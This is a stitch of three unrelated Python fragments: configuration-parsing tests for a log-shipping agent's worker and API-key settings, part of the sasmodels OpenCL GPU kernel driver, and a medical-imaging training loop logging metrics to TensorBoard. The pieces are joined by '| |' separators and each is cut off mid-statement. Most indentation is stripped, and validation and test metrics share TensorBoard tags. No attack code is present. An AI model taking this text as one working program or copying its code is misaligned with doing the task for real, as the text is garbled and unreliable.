self.assertEquals(config.max_log_offset_size, 200000000)
self.assertEquals(config.max_existing_log_offset_size, 200000000)
def test_max_send_rate_enforcement_legacy_dont_override(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi",
max_send_rate_enforcement: "legacy",
max_allowed_request_size: 1234,
pipeline_threshold: 0.3,
min_request_spacing_interval: 3.0,
max_request_spacing_interval: 4.0,
max_log_offset_size: 1234,
max_existing_log_offset_size: 1234
}
"""
)
config = self.get_configuration_with_logger()
config.parse()
self.assertEquals(config.max_send_rate_enforcement, "legacy")
self.assertIsNone(config.parsed_max_send_rate_enforcement)
self.assertEquals(config.max_allowed_request_size, 1234)
self.assertEquals(config.pipeline_threshold, 0.3)
self.assertEquals(config.min_request_spacing_interval, 3.0)
self.assertEquals(config.max_request_spacing_interval, 4.0)
self.assertEquals(config.max_log_offset_size, 1234)
self.assertEquals(config.max_existing_log_offset_size, 1234)
def test_win32_max_open_fds(self):
# 1. default value
self._write_file_with_separator_conversion(
""" {
api_key: "foo",
}
"""
)
config = self.get_configuration_with_logger()
config.parse()
self.assertEquals(config.win32_max_open_fds, 512)
# 2. overwritten value
self._write_file_with_separator_conversion(
""" {
api_key: "foo",
win32_max_open_fds: 1024
}
"""
)
config = self.get_configuration_with_logger()
config.parse()
self.assertEquals(config.win32_max_open_fds, 1024)
class TestWorkersConfiguration(TestConfigurationBase):
def test_no_workers_entry_(self):
# The 'workers' list does not exist, a default api_key entry should be created.
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
# only defaults are created.
assert len(config.worker_configs) == 1
assert config.worker_configs[0] == JsonObject(
api_key=config.api_key,
id="default",
sessions=config.default_sessions_per_worker,
)
def test_empty_workers_entry(self):
"""
Does not make so much sense, but still a valid case to apply a default worker.
:return:
"""
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
workers: [
]
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert len(config.worker_configs) == 1
api_key = config.worker_configs[0]
assert api_key == JsonObject(
api_key=config.api_key,
id="default",
sessions=config.default_sessions_per_worker,
)
(
worker_type,
sessions_count,
api_keys_count,
) = config.get_number_of_configured_sessions_and_api_keys()
self.assertEqual(worker_type, "threaded")
self.assertEqual(sessions_count, 1)
self.assertEqual(api_keys_count, 1)
def test_overwrite_default_workers(self):
self._write_file_with_separator_conversion(
""" {
api_key: "key"
workers: [
{
"api_key": "key", id: "default", "sessions": 4
}
]
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert len(config.worker_configs) == 1
assert config.worker_configs[0] == JsonObject(
api_key=config.api_key,
id="default",
sessions=4,
)
(
worker_type,
sessions_count,
api_keys_count,
) = config.get_number_of_configured_sessions_and_api_keys()
self.assertEqual(worker_type, "threaded")
self.assertEqual(sessions_count, 4)
self.assertEqual(api_keys_count, 1)
def test_overwrite_default_workers_without_api_key(self):
self._write_file_with_separator_conversion(
""" {
api_key: "key"
workers: [
{
id: "default", "sessions": 4
}
]
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert len(config.worker_configs) == 1
assert config.worker_configs[0] == JsonObject(
api_key=config.api_key,
id="default",
sessions=4,
)
(
worker_type,
sessions_count,
api_keys_count,
) = config.get_number_of_configured_sessions_and_api_keys()
self.assertEqual(worker_type, "threaded")
self.assertEqual(sessions_count, 4)
self.assertEqual(api_keys_count, 1)
def test_default_workers_and_second(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there",
workers: [
{
"api_key": "key", "id": "second"
}
]
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert len(config.worker_configs) == 2
workers = list(config.worker_configs)
assert workers[0] == JsonObject(
api_key=config.api_key,
id="default",
sessions=config.default_sessions_per_worker,
)
assert workers[1] == JsonObject(
api_key="key",
id="second",
sessions=1,
)
def test_second_default_api_key(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there",
workers: [
{
"api_key": "key", "id": "default"
},
{
"api_key": "key2", "id": "default"
}
]
}
"""
)
config = self._create_test_configuration_instance()
with pytest.raises(BadConfiguration) as err_info:
config.parse()
assert (
"The API key of the default worker has to match the main API key of the configuration"
in err_info.value.message
)
def test_worker_id_duplication(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there",
workers: [
{
"api_key": "key", "id": "second"
},
{
"api_key": "key2", "id": "second"
}
]
}
"""
)
config = self._create_test_configuration_instance()
with pytest.raises(BadConfiguration) as err_info:
config.parse()
assert (
"There are multiple workers with the same 'second' id. Worker id's must remain unique."
in err_info.value.message
)
def test_api_key_field_missing(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there",
workers: [
{
"id": "second"
},
{
"api_key": "key2", "id": "third"
}
]
}
"""
)
config = self._create_test_configuration_instance()
with pytest.raises(BadConfiguration) as err_info:
config.parse()
assert 'The required field "api_key" is missing.' in err_info.value.message
def test_api_key_entry_id_field_missing(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there",
workers: [
{
"api_key": "key"
},
{
"api_key": "key2", "id": "third"
}
]
}
"""
)
config = self._create_test_configuration_instance()
with pytest.raises(BadConfiguration) as err_info:
config.parse()
assert 'The required field "id" is missing.' in err_info.value.message
def test_log_file_bind_to_workers_entries(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there",
workers: [
{
api_key: "key2"
"sessions": 4,
"id": "second",
}
],
logs: [
{
path: "/some/path.log",
worker_id: "second"
},
{
path: "/some/path2.log",
}
]
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert len(config.worker_configs) == 2
assert config.worker_configs[0] == JsonObject(
sessions=1, api_key=config.api_key, id="default"
)
assert config.worker_configs[1] == JsonObject(
sessions=4,
api_key="key2",
id="second",
)
(
worker_type,
sessions_count,
api_keys_count,
) = config.get_number_of_configured_sessions_and_api_keys()
self.assertEqual(worker_type, "threaded")
self.assertEqual(sessions_count, 5)
self.assertEqual(api_keys_count, 2)
def test_log_file_bind_to_worker_entries_with_non_existing_id(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there",
workers: [
{
api_key: "key2"
"sessions": 4,
"id": "second"
}
],
logs: [
{
path: "/some/path.log",
worker_id: "wrong worker id"
},
{
path: "/some/path2.log",
}
]
}
"""
)
config = self._create_test_configuration_instance()
with pytest.raises(BadConfiguration) as err_info:
config.parse()
assert (
"refers to a non-existing worker with id 'wrong worker id'."
in err_info.value.message
)
assert "Valid worker ids: default, second." in err_info.value.message
def test_workers_type_default(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert not config.use_multiprocess_workers
@skipIf(platform.system() == "Windows", "Skipping tests under Windows")
@skipIf(
sys.version_info < (2, 7), "Skipping multiprocess configuration for python 2.6"
)
def test_workers_type_multiprocess(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
use_multiprocess_workers: true
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert config.use_multiprocess_workers
(
worker_type,
sessions_count,
api_keys_count,
) = config.get_number_of_configured_sessions_and_api_keys()
self.assertEqual(worker_type, "multiprocess")
self.assertEqual(sessions_count, 1)
self.assertEqual(api_keys_count, 1)
@skipIf(platform.system() == "Windows", "Skipping tests under Windows")
@skipIf(
sys.version_info < (2, 7), "Skipping multiprocess configuration for python 2.6"
)
def test_workers_type_multiprocess_from_env(self):
os_environ_unicode["SCALYR_USE_MULTIPROCESS_WORKERS"] = "True"
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert config.use_multiprocess_workers
@skipIf(platform.system() != "Windows", "Skipping Linux only tests on Windows")
@skipIf(
sys.version_info < (2, 7), "Skipping multiprocess configuration for python 2.6"
)
def test_workers_type_multiprocess_windows(self):
# 'use_multiprocess_workers' option should cause error on Windows.
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
use_multiprocess_workers: true
}
"""
)
config = self._create_test_configuration_instance()
with pytest.raises(BadConfiguration) as err_info:
config.parse()
assert (
"The 'use_multiprocess_workers' option is not supported on windows machines."
in err_info.value.message
)
def test_default_sessions_per_worker(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there",
workers: [
{"api_key": "another_key", "id": "second", "sessions": 3},
{"api_key": "another_key2", "id": "third"}
]
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert len(config.worker_configs) == 3
assert config.worker_configs[0]["api_key"] == config.api_key
assert (
config.worker_configs[0]["sessions"] == config.default_sessions_per_worker
)
assert config.worker_configs[1]["api_key"] == "another_key"
assert config.worker_configs[1]["sessions"] == 3
assert config.worker_configs[2]["api_key"] == "another_key2"
assert (
config.worker_configs[2]["sessions"] == config.default_sessions_per_worker
)
def test_workers_negative_sessions_number(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
workers: [
{"api_key": "another_key", "id": "second_key"},
{"api_key": "another_key2", "id": "third_key", "sessions": -1}
]
}
"""
)
config = self._create_test_configuration_instance()
with pytest.raises(BadConfiguration) as err_info:
config.parse()
assert "Value must be greater than or equal to 1" in err_info.value.message
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
default_sessions_per_worker: -1,
workers: [
{"api_key": "another_key", "id": "second_key"},
{"api_key": "another_key2", "id": "third_key"}
]
}
"""
)
config = self._create_test_configuration_instance()
with pytest.raises(BadConfiguration) as err_info:
config.parse()
assert "Value must be greater than or equal to 1" in err_info.value.message
def test_default_sessions_per_worker_from_env(self):
os_environ_unicode["SCALYR_DEFAULT_SESSIONS_PER_WORKER"] = "4"
self._write_file_with_separator_conversion(
""" {
api_key: "hi there"
workers: [
{"api_key": "another_key", "id": "second_key"},
]
}
"""
)
config = self._create_test_configuration_instance()
config.parse()
assert config.default_sessions_per_worker == 4
return
def test_config_fragment(self):
self._write_file_with_separator_conversion(
""" {
api_key: "hi | |
<filename>sasmodels/kernelcl.py
"""
GPU driver for C kernels
TODO: docs are out of date
There should be a single GPU environment running on the system. This
environment is constructed on the first call to :func:`env`, and the
same environment is returned on each call.
After retrieving the environment, the next step is to create the kernel.
This is done with a call to :meth:`GpuEnvironment.make_kernel`, which
returns the type of data used by the kernel.
Next a :class:`GpuData` object should be created with the correct kind
of data. This data object can be used by multiple kernels, for example,
if the target model is a weighted sum of multiple kernels. The data
should include any extra evaluation points required to compute the proper
data smearing. This need not match the square grid for 2D data if there
is an index saying which q points are active.
Together the GpuData, the program, and a device form a :class:`GpuKernel`.
This kernel is used during fitting, receiving new sets of parameters and
evaluating them. The output value is stored in an output buffer on the
devices, where it can be combined with other structure factors and form
factors and have instrumental resolution effects applied.
In order to use OpenCL for your models, you will need OpenCL drivers for
your machine. These should be available from your graphics card vendor.
Intel provides OpenCL drivers for CPUs as well as their integrated HD
graphics chipsets. AMD also provides drivers for Intel CPUs, but as of
this writing the performance is lacking compared to the Intel drivers.
NVidia combines drivers for CUDA and OpenCL in one package. The result
is a bit messy if you have multiple drivers installed. You can see which
drivers are available by starting python and running:
import pyopencl as cl
cl.create_some_context(interactive=True)
Once you have done that, it will show the available drivers which you
can select. It will then tell you that you can use these drivers
automatically by setting the SAS_OPENCL environment variable, which is
PYOPENCL_CTX equivalent but not conflicting with other pyopencl programs.
Some graphics cards have multiple devices on the same card. You cannot
yet use both of them concurrently to evaluate models, but you can run
the program twice using a different device for each session.
OpenCL kernels are compiled when needed by the device driver. Some
drivers produce compiler output even when there is no error. You
can see the output by setting PYOPENCL_COMPILER_OUTPUT=1. It should be
harmless, albeit annoying.
"""
from __future__ import print_function
import sys
import os
import warnings
import logging
import time
try:
from time import perf_counter as clock
except ImportError: # CRUFT: python < 3.3
if sys.platform.count("darwin") > 0:
from time import time as clock
else:
from time import clock
import numpy as np # type: ignore
# Attempt to setup OpenCL. This may fail if the pyopencl package is not
# installed or if it is installed but there are no devices available.
try:
import pyopencl as cl # type: ignore
from pyopencl import mem_flags as mf
from pyopencl.characterize import get_fast_inaccurate_build_options
# Ask OpenCL for the default context so that we know that one exists.
cl.create_some_context(interactive=False)
HAVE_OPENCL = True
OPENCL_ERROR = ""
except Exception as exc:
HAVE_OPENCL = False
OPENCL_ERROR = str(exc)
from . import generate
from .generate import F32, F64
from .kernel import KernelModel, Kernel
# pylint: disable=unused-import
try:
from typing import Tuple, Callable, Any
from .modelinfo import ModelInfo
from .details import CallDetails
except ImportError:
pass
# pylint: enable=unused-import
# CRUFT: pyopencl < 2017.1 (as of June 2016 needs quotes around include path).
def quote_path(v):
    # type: (str) -> str
    """
    Wrap *v* in double quotes when it contains a space.

    Empty strings, already-quoted paths, and values that look like compiler
    options (leading '-', e.g. -Ipath) are returned unchanged.  This is
    fragile: a -Ipath option containing a space still needs manual quoting.
    """
    needs_quoting = bool(v) and ' ' in v and v[0] not in "\"'-"
    return '"%s"' % v if needs_quoting else v
def fix_pyopencl_include():
    # type: (None) -> None
    """
    Monkey patch pyopencl so that include paths containing spaces survive
    the compiler command line.
    """
    # pylint: disable=protected-access
    import pyopencl
    if hasattr(pyopencl, '_DEFAULT_INCLUDE_OPTIONS'):
        patched = [quote_path(opt) for opt in pyopencl._DEFAULT_INCLUDE_OPTIONS]
        pyopencl._DEFAULT_INCLUDE_OPTIONS = patched
# Apply the include-path patch as soon as we know pyopencl is importable.
if HAVE_OPENCL:
    fix_pyopencl_include()
# The max loops number is limited by the amount of local memory available
# on the device. You don't want to make this value too big because it will
# waste resources, nor too small because it may interfere with users trying
# to do their polydispersity calculations. A value of 1024 should be much
# larger than necessary given that cost grows as npts^k where k is the number
# of polydisperse parameters.
MAX_LOOPS = 2048
# Pragmas for enable OpenCL features. Be sure to protect them so that they
# still compile even if OpenCL is not present.
_F16_PRAGMA = """\
#if defined(__OPENCL_VERSION__) // && !defined(cl_khr_fp16)
# pragma OPENCL EXTENSION cl_khr_fp16: enable
#endif
"""
_F64_PRAGMA = """\
#if defined(__OPENCL_VERSION__) // && !defined(cl_khr_fp64)
# pragma OPENCL EXTENSION cl_khr_fp64: enable
#endif
"""
def use_opencl():
    # type: () -> bool
    """Return True if OpenCL is the default computational engine"""
    if not HAVE_OPENCL:
        return False
    engine = os.environ.get("SAS_OPENCL", "OpenCL").lower()
    return engine != "none" and not engine.startswith("cuda")
ENV = None
def reset_environment():
    # type: () -> "GpuEnvironment"
    """
    Return a new OpenCL context, such as after a change to SAS_OPENCL.
    """
    global ENV
    if use_opencl():
        ENV = GpuEnvironment()
    else:
        ENV = None
    return ENV
def environment():
    # type: () -> "GpuEnvironment"
    """
    Returns a singleton :class:`GpuEnvironment`.

    This provides an OpenCL context and one queue per device.
    """
    if ENV is not None:
        return ENV
    # No environment yet: build one, but fail loudly when OpenCL never
    # initialized or when the user explicitly disabled it.
    if not HAVE_OPENCL:
        raise RuntimeError("OpenCL startup failed with ***"
                           + OPENCL_ERROR + "***; using C compiler instead")
    reset_environment()
    if ENV is None:
        raise RuntimeError("SAS_OPENCL=None in environment")
    return ENV
def has_type(device, dtype):
    # type: (cl.Device, np.dtype) -> bool
    """
    Return true if device supports the requested precision.
    """
    # Single precision is mandated by the OpenCL spec; doubles need the
    # cl_khr_fp64 extension.  F16 is deliberately unsupported because it
    # isn't accurate enough for our use.
    if dtype == F32:
        return True
    return dtype == F64 and "cl_khr_fp64" in device.extensions
def get_warp(kernel, queue):
    # type: (cl.Kernel, cl.CommandQueue) -> int
    """
    Return the size of an execution batch for *kernel* running on *queue*.
    """
    info = cl.kernel_work_group_info.PREFERRED_WORK_GROUP_SIZE_MULTIPLE
    return kernel.get_work_group_info(info, queue.device)
def compile_model(context, source, dtype, fast=False):
    # type: (cl.Context, str, np.dtype, bool) -> cl.Program
    """
    Build a model to run on the gpu.

    Returns the compiled program and its type.

    Raises an error if the desired precision is not available.
    """
    dtype = np.dtype(dtype)
    if not all(has_type(device, dtype) for device in context.devices):
        raise RuntimeError("%s not supported for devices"%dtype)
    # Assemble the translation unit: optional USE_SINCOS define, optional
    # precision pragma, then the dtype-converted kernel source.
    header = []
    # Note: USE_SINCOS makes the Intel CPU slower under OpenCL.
    if context.devices[0].type == cl.device_type.GPU:
        header.append("#define USE_SINCOS\n")
    if dtype == generate.F16:
        header.append(_F16_PRAGMA)
    elif dtype == generate.F64:
        header.append(_F64_PRAGMA)
    full_source = "\n".join(header + [generate.convert_type(source, dtype)])
    if fast:
        options = get_fast_inaccurate_build_options(context.devices[0])
    else:
        options = []
    return cl.Program(context, full_source).build(options=options)
# For now, this returns one device in the context.
# TODO: Create a context that contains all devices on all platforms.
class GpuEnvironment(object):
"""
GPU context for OpenCL, with possibly many devices and one queue per device.
"""
    def __init__(self):
        # type: () -> None
        """
        Select an OpenCL context for single and double precision work and
        create one command queue per distinct context.

        After construction:
        * ``self.context`` maps F32/F64 to a context supporting that
          precision, or None when no device does.
        * ``self.queue`` maps F32/F64 to a command queue on the first
          device of the corresponding context; the F32 queue is shared
          when both precisions resolve to the same context.
        * ``self.compiled`` is an empty cache for compiled programs.
        """
        # Find gpu context.
        context_list = _create_some_context()
        # Find a context for F32 and for F64 (maybe the same one).
        # F16 isn't good enough.
        self.context = {}
        for dtype in (F32, F64):
            # for/else: the else branch runs only when no context in the
            # list supports this dtype.
            for context in context_list:
                if has_type(context.devices[0], dtype):
                    self.context[dtype] = context
                    break
            else:
                self.context[dtype] = None
        # Build a queue for each context.
        self.queue = {}
        context = self.context[F32]
        self.queue[F32] = cl.CommandQueue(context, context.devices[0])
        if self.context[F64] == self.context[F32]:
            # Same context for both precisions: reuse the F32 queue.
            self.queue[F64] = self.queue[F32]
        else:
            context = self.context[F64]
            self.queue[F64] = cl.CommandQueue(context, context.devices[0])
        ## Byte boundary for data alignment.
        #self.data_boundary = max(context.devices[0].min_data_type_align_size
        #                         for context in self.context.values())
        # Cache for compiled programs, and for items in context.
        self.compiled = {}
def has_type(self, dtype):
# type: (np.dtype) -> bool
"""
Return True if all devices support a given type.
"""
return self.context.get(dtype, None) is not None
def compile_program(self, name, source, dtype, fast, timestamp):
# type: (str, str, np.dtype, bool, float) -> cl.Program
"""
Compile the program for the device in the given context.
"""
# Note: PyOpenCL caches based on md5 hash of source, options and device
# but I'll do so as well just to save some data munging time.
tag = generate.tag_source(source)
key = "%s-%s-%s%s"%(name, dtype, tag, ("-fast" if fast else | |
)
avg_training_recall_of_epoch = np.average(self.stats.training_recall)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Train Recall", avg_training_recall_of_epoch, self.epoch_sup_current + 1
)
avg_training_f1_of_epoch = np.average(self.stats.training_f1)
self.tb_writer.add_scalar("Avg Epoch Classification Metrics/Train F1", avg_training_f1_of_epoch, self.epoch_sup_current + 1)
avg_training_accuracy_of_epoch = np.average(self.stats.training_accuracy)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Train Accuracy", avg_training_accuracy_of_epoch, self.epoch_sup_current + 1
)
avg_validation_precision_of_epoch = np.average(self.stats.validation_precision)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Test Precision", avg_validation_precision_of_epoch, self.epoch_sup_current + 1
)
avg_validation_recall_of_epoch = np.average(self.stats.validation_recall)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Test Recall", avg_validation_recall_of_epoch, self.epoch_sup_current + 1
)
avg_validation_f1_of_epoch = np.average(self.stats.validation_f1)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Test F1 ", avg_validation_f1_of_epoch, self.epoch_sup_current + 1
)
avg_validation_accuracy_of_epoch = np.average(self.stats.validation_accuracy)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Test Accuracy", avg_validation_accuracy_of_epoch, self.epoch_sup_current + 1
)
avg_testing_precision_of_epoch = np.average(self.stats.testing_precision)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Test Precision", avg_testing_precision_of_epoch, self.epoch_sup_current + 1
)
avg_testing_recall_of_epoch = np.average(self.stats.testing_recall)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Test Recall", avg_testing_recall_of_epoch, self.epoch_sup_current + 1
)
avg_testing_f1_of_epoch = np.average(self.stats.testing_f1)
self.tb_writer.add_scalar("Avg Epoch Classification Metrics/Test F1 ", avg_testing_f1_of_epoch, self.epoch_sup_current + 1)
avg_testing_accuracy_of_epoch = np.average(self.stats.testing_accuracy)
self.tb_writer.add_scalar(
"Avg Epoch Classification Metrics/Test Accuracy", avg_testing_accuracy_of_epoch, self.epoch_sup_current + 1
)
self.tb_writer.add_scalars(
"Avg Epoch Classification TRAIN Metrics/",
{
"Train Precision": avg_training_precision_of_epoch,
"Train Recall": avg_training_recall_of_epoch,
"Train F1": avg_training_f1_of_epoch,
"Train Accuracy": avg_training_accuracy_of_epoch,
},
self.epoch_sup_current + 1,
)
self.tb_writer.add_scalars(
"Avg Epoch Classification VALIDATION Metrics/",
{
"Test Precision": avg_validation_precision_of_epoch,
"Test Recall": avg_validation_recall_of_epoch,
"Test F1": avg_validation_f1_of_epoch,
"Test Accuracy": avg_validation_accuracy_of_epoch,
},
self.epoch_sup_current + 1,
)
self.tb_writer.add_scalars(
"Avg Epoch Classification TEST Metrics/",
{
"Test Precision": avg_testing_precision_of_epoch,
"Test Recall": avg_testing_recall_of_epoch,
"Test F1": avg_testing_f1_of_epoch,
"Test Accuracy": avg_testing_accuracy_of_epoch,
},
self.epoch_sup_current + 1,
)
if "unet_acs_with_cls" in self.config.model.lower():
avg_training_loss_of_epoch_seg = np.average(self.stats.training_losses_sup_seg)
avg_training_loss_of_epoch_cls = np.average(self.stats.training_losses_sup_cls)
if self.config.introduce_surrogate_at_epoch <= self.epoch_sup_current:
self.tb_writer.add_scalar(
"Avg Loss Epoch/Train Segmentation", avg_training_loss_of_epoch_seg, self.epoch_sup_current + 1
)
self.tb_writer.add_scalar("Avg Loss Epoch/Train CLS", avg_training_loss_of_epoch_cls, self.epoch_sup_current + 1)
else:
self.tb_writer.add_scalar(
"Avg Loss Epoch/Train Segmentation", avg_training_loss_of_epoch_seg, self.epoch_sup_current + 1
)
avg_validation_loss_of_epoch_seg = np.average(self.stats.validation_losses_sup_seg)
avg_validation_loss_of_epoch_cls = np.average(self.stats.validation_losses_sup_cls)
if self.config.introduce_surrogate_at_epoch <= self.epoch_sup_current:
self.tb_writer.add_scalar(
"Avg Loss Epoch/Validation Segmentation", avg_validation_loss_of_epoch_seg, self.epoch_sup_current + 1
)
self.tb_writer.add_scalar("Avg Loss Epoch/Validation CLS", avg_validation_loss_of_epoch_cls, self.epoch_sup_current + 1)
else:
self.tb_writer.add_scalar(
"Avg Loss Epoch/Validation Segmentation", avg_validation_loss_of_epoch_seg, self.epoch_sup_current + 1
)
avg_testing_loss_of_epoch_seg = np.average(self.stats.testing_losses_sup_seg)
avg_testing_loss_of_epoch_cls = np.average(self.stats.testing_losses_sup_cls)
if self.config.introduce_surrogate_at_epoch <= self.epoch_sup_current:
self.tb_writer.add_scalar(
"Avg Loss Epoch/Testing Segmentation", avg_testing_loss_of_epoch_seg, self.epoch_sup_current + 1
)
self.tb_writer.add_scalar("Avg Loss Epoch/Validation CLS", avg_testing_loss_of_epoch_cls, self.epoch_sup_current + 1)
else:
self.tb_writer.add_scalar(
"Avg Loss Epoch/Testing Segmentation", avg_testing_loss_of_epoch_seg, self.epoch_sup_current + 1
)
if self.config.introduce_surrogate_at_epoch <= self.epoch_sup_current:
self.tb_writer.add_scalars(
"Avg Loss Epoch/",
{
"Train Segmentation": avg_training_loss_of_epoch_seg,
"Train CLS": avg_training_loss_of_epoch_cls,
"Train Global": avg_training_loss_of_epoch,
"Validation Segmentation": avg_validation_loss_of_epoch_seg,
"Validation CLS": avg_validation_loss_of_epoch_cls,
"Validation Global": avg_validation_loss_of_epoch,
"Testing Segmentation": avg_testing_loss_of_epoch_seg,
"Testing CLS": avg_testing_loss_of_epoch_cls,
"Testing Global": avg_testing_loss_of_epoch,
},
self.epoch_sup_current + 1,
)
else:
self.tb_writer.add_scalars(
"Avg Loss Epoch/",
{
"Train Segmentation": avg_training_loss_of_epoch_seg,
"Train Global": avg_training_loss_of_epoch,
"Validation Segmentation": avg_validation_loss_of_epoch_seg,
"Validation Global": avg_validation_loss_of_epoch,
"Testing Segmentation": avg_testing_loss_of_epoch_seg,
"Testing Global": avg_testing_loss_of_epoch,
},
self.epoch_sup_current + 1,
)
if self.config.scheduler_sup.lower() == "reducelronplateau":
self.scheduler_sup.step(avg_validation_loss_of_epoch)
else:
self.scheduler_sup.step(self.epoch_sup_current)
print("------------- SUPERVISED --------------")
if "unet_acs_with_cls" in self.config.model.lower():
print(
"Epoch {}, test loss is {:.4f}, Validation loss is {:.3f}, training loss is {:.3f}. \n Validation Loss SEG is {}, Training loss SEG is {:.3f} \n Validation Loss Cls is {}, Training loss cls is {:.3f} \n Precision: TR {:.2f} / Test {:.2f} ; Recall: {:.2f} / {:.2f} ; F1:{:.2f} / {:.2f}, Accuracy:{:.2f} / {:.2f}".format(
self.epoch_sup_current + 1,
avg_testing_loss_of_epoch,
avg_validation_loss_of_epoch,
avg_training_loss_of_epoch,
avg_validation_loss_of_epoch_seg,
avg_training_loss_of_epoch_seg,
avg_validation_loss_of_epoch_cls,
avg_training_loss_of_epoch_cls,
avg_training_precision_of_epoch,
avg_validation_precision_of_epoch,
avg_training_recall_of_epoch,
avg_validation_recall_of_epoch,
avg_training_f1_of_epoch,
avg_validation_f1_of_epoch,
avg_training_accuracy_of_epoch,
avg_validation_accuracy_of_epoch,
)
)
else:
print(
"Epoch {},test loss is {:.4f}, validation loss is {:.4f}, training loss is {:.4f}".format(
self.epoch_sup_current + 1, avg_testing_loss_of_epoch, avg_validation_loss_of_epoch, avg_training_loss_of_epoch
)
)
try:
print("CURRNT SUP LR: {}".format(self.scheduler_sup.get_last_lr()))
except AttributeError:
print("CURRENT SUP LR: {}".format(self.optimizer_sup.param_groups[0]["lr"]))
if avg_validation_loss_of_epoch < self.best_loss_sup:
print("Validation loss decreased from {:.4f} to {:.4f}".format(self.best_loss_sup, avg_validation_loss_of_epoch))
self.best_loss_sup = avg_validation_loss_of_epoch
self.num_epoch_no_improvement_sup = 0
if self.config.save_model_every_n_epochs == 0:
self._save_model("sup")
elif (self.epoch_sup_current + 1) % self.config.save_model_every_n_epochs == 0:
self._save_model("sup", suffix="epoch_{}".format(self.epoch_sup_current + 1))
else:
print(
"Validation loss did not decrease from {:.4f}, num_epoch_no_improvement {}".format(
self.best_loss_sup, self.num_epoch_no_improvement_sup + 1
)
)
self.num_epoch_no_improvement_sup += 1
if self.config.save_model_every_n_epochs == 0:
self._save_model("sup", suffix="_no_decrease")
elif (self.epoch_sup_current + 1) % self.config.save_model_every_n_epochs == 0:
self._save_model("sup", suffix="epoch_{}".format(self.epoch_sup_current + 1))
if self.num_epoch_no_improvement_sup >= self.config.patience_sup_terminate:
print("Early Stopping SUP")
self.stats.stopped_early_sup = True
break
sys.stdout.flush()
self.tb_writer.add_scalar("Num_epochs w/ no improvement", self.num_epoch_no_improvement_sup, self.epoch_sup_current + 1)
self.sup_timedelta = time.time() - self.start_time
training_time_minutes = self.sup_timedelta // 60
training_time_hours = training_time_minutes / 60
print("TOTAL TRAINING TIME! MINUTES {}, HOURS{}".format(training_time_minutes, training_time_hours))
with open(os.path.join(self.stats.save_directory, "training_time.json"), "w") as f:
json.dump({"training_time_m": training_time_minutes, "training_time_h": training_time_hours}, f)
self._add_completed_flag_to_last_checkpoint_saved(phase="sup")
self.tb_writer.flush()
self.tb_writer.close()
print("FINISHED TRAINING SUP")
@staticmethod
def compute_precision_recall_f1(prediction, target):
# make target binary
predicted_labels = prediction.argmax(1)
# multi class f1-score will be done macro averaging as all classes are equally important #alternatily (emphasize z axis??)
pr, rec, f1, _ = precision_recall_fscore_support(
target, predicted_labels, average="macro"
) # sometimes predcited dont match target that's fine but some will of these metrics will be 0
accuracy = float((predicted_labels == target).sum()) / float(len(target))
return pr, rec, f1, accuracy
def add_hparams_to_writer(self):
hpa_dict = {
# "cube_dimensions": self.dataset.cube_dimensions
# if isinstance(self.dataset, Dataset) or isinstance(self.dataset, Dataset2D)
# else self.dataset[0].cube_dimensions,
"initial_lr_ss": self.config.lr_ss,
"loss_ss": self.config.loss_function_ss,
"optimizer_ss": self.config.optimizer_ss,
"scheduler_ss": self.config.scheduler_ss,
"batch_size_ss": self.config.batch_size_ss,
"nr_epochs_ss": self.config.nb_epoch_ss,
"initial_lr_sup": self.config.lr_sup,
"loss_sup": self.config.loss_function_sup,
"optimizer_sup": self.config.optimizer_sup,
"scheduler_sup": self.config.scheduler_sup,
"batch_size_sup": self.config.batch_size_sup,
"nr_epochs_sup": self.config.nb_epoch_sup,
}
self.ss_timedelta = 0 if (not hasattr(self, "ss_timedelta")) else (self.ss_timedelta // 60) # onversion to minutes
self.sup_timedelta = 0 if (not hasattr(self, "sup_timedelta")) else (self.sup_timedelta // 60)
self.stats.last_avg_training_loss_per_epoch_ss = (
0 if not self.stats.avg_training_loss_per_epoch_ss else self.stats.avg_training_loss_per_epoch_ss[-1]
)
self.stats.last_avg_validation_loss_per_epoch_ss = (
0 if not self.stats.avg_validation_loss_per_epoch_ss else self.stats.avg_validation_loss_per_epoch_ss[-1]
)
self.stats.last_avg_training_loss_per_epoch_sup = (
0 if not self.stats.avg_training_loss_per_epoch_sup else self.stats.avg_training_loss_per_epoch_sup[-1]
)
self.stats.last_avg_validation_loss_per_epoch_sup = (
0 if not self.stats.avg_validation_loss_per_epoch_sup else self.stats.avg_validation_loss_per_epoch_sup[-1]
)
met_dict = {
"final_train_loss_ss": self.stats.last_avg_training_loss_per_epoch_ss,
"final_val_loss_ss": self.stats.last_avg_validation_loss_per_epoch_ss,
"stopped_early_ss": self.stats.stopped_early_ss,
